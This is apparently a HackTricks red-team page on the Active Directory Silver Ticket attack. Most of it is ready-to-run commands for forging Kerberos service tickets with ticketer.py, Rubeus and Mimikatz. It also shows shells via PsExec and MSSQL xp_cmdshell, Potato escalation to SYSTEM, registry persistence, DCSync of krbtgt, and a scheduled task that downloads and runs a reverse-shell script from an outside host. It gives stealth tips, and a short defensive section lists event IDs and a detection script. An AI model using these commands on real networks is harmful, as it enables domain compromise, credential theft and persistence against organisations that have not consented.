Silver Ticket

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Silver ticket

The Silver Ticket attack abuses service tickets in Active Directory (AD) environments. It relies on obtaining the key of a service account (its NTLM hash or, preferably, its AES key; computer accounts are the most common case) in order to forge a Ticket Granting Service (TGS) ticket for the services run by that account. With the forged ticket the attacker can access that specific service impersonating any user, usually one with administrative privileges over it. Forging with AES keys matches what legitimate clients use today, so it is both more reliable and harder to detect than RC4.

Warning

Silver Tickets are harder to detect than Golden Tickets: the forged TGS is presented directly to the service and never reaches a Domain Controller, so the DC logs nothing, and only the service account's key is needed, not the krbtgt key. The trade-off is scope: a ticket is only valid for the services that run under the account whose key you hold. For example, if you obtain the password (or hash/AES key) of any account that has an SPN, you can use it to forge a Silver Ticket that impersonates any user to the services behind that SPN.

Modern Kerberos changes (AES-only domains)

  • Windows updates starting 8 Nov 2022 (KB5021131) default service tickets to AES session keys when possible and are phasing out RC4. DCs are expected to ship with RC4 disabled by default by mid-2026, so relying on NTLM/RC4 hashes for silver tickets increasingly fails with KRB_AP_ERR_MODIFIED. Always extract the AES keys (aes256-cts-hmac-sha1-96 / aes128-cts-hmac-sha1-96) of the target service account.
  • If the service account's msDS-SupportedEncryptionTypes is restricted to AES, you must forge with /aes256 (mimikatz, Rubeus) or -aesKey (ticketer.py); RC4 (/rc4 or -nthash) will not work even if you hold the NTLM hash.
  • gMSA and computer accounts rotate their password every 30 days by default; dump the current AES key from LSASS, with secretsdump/NTDS, or via DCSync right before forging, or the ticket will not decrypt.
  • OPSEC: the default ticket lifetime in the tools is 10 years; set realistic durations (mimikatz /endin:600 is in minutes, ticketer.py -duration is in days, so use 1) to avoid standing out because of an abnormal lifetime.

Different tools are used to forge the ticket depending on the operating system:

On Linux

# Forge with AES instead of RC4 (works for gMSA/machine accounts too);
# <USER> is the account to impersonate and the SPN must match the target service exactly
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn <SERVICE_PRINCIPAL_NAME> <USER>
# or read the key directly from a keytab (useful when only a keytab was obtained)
python ticketer.py -keytab service.keytab -spn <SPN> -domain <DOMAIN> -domain-sid <DOMAIN_SID> <USER>

# shorten validity for stealth (-duration is in days, default 3650)
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn cifs/<HOST_FQDN> -duration 1 <USER>

# ticketer.py writes <USER>.ccache into the current directory
export KRB5CCNAME=/root/impacket-examples/<USER>.ccache
# target the host by the FQDN used in the SPN (not an IP) so the Kerberos ticket is actually used
python psexec.py <DOMAIN>/<USER>@<HOST_FQDN> -k -no-pass

On Windows

# Forging the ticket directly with Rubeus (silver command)
# /ldap pulls the domain SID and user data from LDAP automatically (needs a domain context)
# /printcmd prints the complete command so the attack can be replicated later
rubeus.exe silver /service:cifs/<TARGET_FQDN> /user:<USER> [/aes256:<HASH> | /aes128:<HASH> | /rc4:<HASH>] \
/domain:<DOMAIN> /ldap /ptt /nowrap /printcmd

# Forging the ticket directly with Mimikatz (silver ticket => /service + /target; /endin is the lifetime in minutes)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/aes256:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /endin:600 /ptt"
# RC4 works only if the service account still accepts RC4 (the ticket never reaches the DC; the service decrypts it)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /endin:600 /ptt"

# Inject an already forged kirbi
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS service is the usual target because it gives access to the victim's file system, but other services such as HOST and RPCSS can be abused as well, for scheduled tasks and WMI requests respectively.

Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM

If you have the NTLM hash (or AES key) of the SQL service account (for example, sqlsvc) you can forge a TGS for the MSSQL SPN and impersonate any user to the SQL service. The impersonated user must map to a login with sysadmin rights on that instance (or at least be allowed to reconfigure it). From there, enable xp_cmdshell to execute commands as the SQL service account. If that token has SeImpersonatePrivilege, chain a Potato to elevate to SYSTEM.

# Forge a silver ticket for MSSQLSvc (AES example); the SPN must match the instance (host and port) exactly
python ticketer.py -aesKey <SQLSVC_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn MSSQLSvc/<host.fqdn>:1433 administrator
export KRB5CCNAME=$PWD/administrator.ccache

# Connect to SQL using Kerberos (-k -no-pass); the port is a separate switch, not part of the target
impacket-mssqlclient -k -no-pass -port 1433 <DOMAIN>/administrator@<host.fqdn>
# In the SQL> shell enable xp_cmdshell and run a command
SQL> EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami'
# (mssqlclient also ships the shortcuts "enable_xp_cmdshell" and "xp_cmdshell whoami")
  • If the obtained context has SeImpersonatePrivilege (usually true for service accounts), use a Potato variant to get SYSTEM:
# On the target host (via xp_cmdshell or interactively), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"

More information on abusing MSSQL and enabling xp_cmdshell:

MSSQL AD Abuse

Potato techniques overview:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Available Services

| Service type | Service silver tickets |
| --- | --- |
| WMI | HOST, RPCSS |
| PowerShell Remoting | HOST, HTTP (depending on the OS also WSMAN, RPCSS) |
| WinRM | HOST, HTTP (on some occasions you can just ask for WINRM) |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, including DCSync | LDAP |
| Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS |
| Golden Tickets | krbtgt |

With Rubeus you can request all of these tickets at once from a single TGS by using the parameter:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Event IDs for Silver tickets

  • 4624: An account was successfully logged on (on the target host, logon type 3 with Kerberos as the authentication package)
  • 4634: An account was logged off
  • 4672: Special privileges assigned to new logon (admin logon)
  • No preceding 4768/4769 on any DC for the same client/service is a common indicator of a forged TGS being presented directly to the service.
  • An abnormally long ticket lifetime (the 10-year default of the forging tools) or an unexpected encryption type (RC4 when the domain enforces AES) also stands out when the ticket data is compared with the DC's 4769 records or with the tickets cached on the host.
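The two indicators above as detection logic, added here as an example (not from the original page or from any SIEM product): it correlates Kerberos network logons on a member server with the 4769 service-ticket requests seen on the DCs, and separately flags RC4 service tickets in a domain that is assumed to enforce AES. The event keys follow the Windows Security event XML field names, and the sample events, host names and the AES_ONLY_DOMAIN assumption are constructed for the example.

```python
# Added example (not from the original page): detection logic for the two
# indicators above, run over constructed sample events. Keys follow the
# Windows Security event XML field names; the events themselves are made up.
from datetime import datetime, timedelta

AES_ONLY_DOMAIN = True   # assumption about the monitored environment
RC4_HMAC = "0x17"        # TicketEncryptionType value for RC4 in 4769

# Constructed sample: alice and bob get real tickets (4769 on a DC, then 4624 on
# SRV01); "administrator" logs on to SRV01 via Kerberos with no 4769 anywhere
# (a silver ticket presented straight to the service) and gets 4672; dave's
# legitimate request was served with RC4 although the domain is AES-only; carol
# used NTLM and is out of scope for this check.
EVENTS = [
    {"EventID": 4769, "Time": "2024-05-01T09:00:00", "Computer": "DC01", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "SRV01$", "TicketEncryptionType": "0x12"},
    {"EventID": 4624, "Time": "2024-05-01T09:00:02", "Computer": "SRV01", "TargetUserName": "alice", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4769, "Time": "2024-05-01T09:05:00", "Computer": "DC02", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "SRV01$", "TicketEncryptionType": "0x12"},
    {"EventID": 4624, "Time": "2024-05-01T09:05:01", "Computer": "SRV01", "TargetUserName": "bob", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:00", "Computer": "DC01", "TargetUserName": "dave@CORP.LOCAL", "ServiceName": "SRV01$", "TicketEncryptionType": "0x17"},
    {"EventID": 4624, "Time": "2024-05-01T10:00:01", "Computer": "SRV01", "TargetUserName": "dave", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "Time": "2024-05-01T11:30:00", "Computer": "SRV01", "TargetUserName": "administrator", "LogonType": 3, "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4672, "Time": "2024-05-01T11:30:00", "Computer": "SRV01", "TargetUserName": "administrator"},
    {"EventID": 4624, "Time": "2024-05-01T11:31:00", "Computer": "SRV01", "TargetUserName": "carol", "LogonType": 3, "AuthenticationPackageName": "NTLM"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def _user(name):
    # 4769 carries user@REALM, 4624 carries the bare name: normalise both
    return name.split("@", 1)[0].lower()


def forged_tgs_logons(events, window=timedelta(hours=10)):
    """Kerberos network logons (4624) with no 4769 for the same user and target
    computer account on any DC within `window` before the logon."""
    tgs_requests = [e for e in events if e["EventID"] == 4769]
    admin_logons = {(e["Computer"], _user(e["TargetUserName"]))
                    for e in events if e["EventID"] == 4672}
    findings = []
    for e in events:
        if (e["EventID"] != 4624 or e.get("LogonType") != 3
                or e.get("AuthenticationPackageName") != "Kerberos"):
            continue
        logon_time = _ts(e["Time"])
        user = _user(e["TargetUserName"])
        service = e["Computer"].upper() + "$"   # host SPNs resolve to the computer account
        covered = any(
            _user(r["TargetUserName"]) == user
            and r["ServiceName"].upper() == service
            and logon_time - window <= _ts(r["Time"]) <= logon_time
            for r in tgs_requests
        )
        if not covered:
            findings.append({
                "Time": e["Time"], "Computer": e["Computer"], "User": user,
                "AdminRights": (e["Computer"], user) in admin_logons,
            })
    return findings


def unexpected_rc4_tickets(events, aes_only=AES_ONLY_DOMAIN):
    """4769 events where the service ticket was encrypted with RC4 in a domain
    that is supposed to enforce AES."""
    if not aes_only:
        return []
    return [e for e in events
            if e["EventID"] == 4769 and e.get("TicketEncryptionType") == RC4_HMAC]


if __name__ == "__main__":
    for f in forged_tgs_logons(EVENTS):
        print("possible forged TGS:", f)
    for e in unexpected_rc4_tickets(EVENTS):
        print("RC4 ticket in AES-only domain:", e["TargetUserName"], e["ServiceName"])
```

Feed it events from every DC plus the member servers you care about: a DC missing from the collection produces false positives, and the window should be at least the TGS lifetime (10 hours by default) because a legitimately issued ticket can be cached and reused long after its 4769.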

Persistence

To prevent a machine from changing its password every 30 days (which would invalidate your silver tickets), set HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1 on that machine, or set HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge to a value (in days) larger than 30 to lengthen the rotation period after which the machine password is changed. Both require administrative access to the host.

Abusing Service tickets

In the following examples assume that the ticket was obtained impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ shares over SMB (if they are exposed) and copy files to any part of the remote file system by doing something like:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

You will also be able to get a shell inside the host or execute arbitrary commands using psexec:

PsExec/Winexec/ScExec

HOST

With this permission you can create scheduled tasks on remote computers and execute arbitrary commands:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "powershell.exe -c \"iex (New-Object Net.WebClient).DownloadString('http://172.16.100.114:8080/pc.ps1')\""
#Check it was successfully created
schtasks /query /S some.vuln.pc /TN "SomeTaskName"
#Run the created schtask now
schtasks /Run /S some.vuln.pc /TN "SomeTaskName"

HOST + RPCSS

With these tickets you can execute WMI on the victim system:

#Check you have enough privileges (a WMI query against the remote host)
Get-WmiObject -Class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod -Class win32_process -ComputerName $Computer -Name Create -ArgumentList "$RunCommand"

#You can also use wmic
wmic /node:remote.computer.local os list full /format:list

Find more information about wmiexec on the following page:

WmiExec

HOST + WSMAN (WINRM)

With winrm access to a computer you can connect to it and even get a PowerShell session:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn more ways to connect to a remote host using winrm:

WinRM

Warning

Note that winrm must be enabled and listening on the remote computer in order to access it.

LDAP

With this ticket you can dump the DC database using DCSync. This requires the key of the DC's own computer account (to forge a ticket for ldap/<dc.fqdn>) and the impersonated user must hold the replication rights (for example a Domain Admin):

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Learn more about DCSync on the following page:

DCSync
